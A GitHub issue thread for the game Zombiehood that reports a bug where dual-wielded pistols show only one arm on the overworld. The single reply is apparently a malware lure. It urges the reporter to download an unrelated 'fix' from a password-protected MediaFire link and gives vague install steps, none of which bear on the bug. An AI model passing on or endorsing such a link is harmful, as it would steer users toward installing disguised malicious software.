### ISSUE TITLE
[BUG] Dual wielded weapons don't show second weapon on the overworld

### ISSUE THREAD

**Issue by ReflextionsDev** [ReflextionsDev/Zombiehood#123]
**Describe the bug**
- The second player arm is missing on the overworld (probably just doesn't spawn)

**To Reproduce**
- Pickup dual burst pistols
- Go to overworld

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
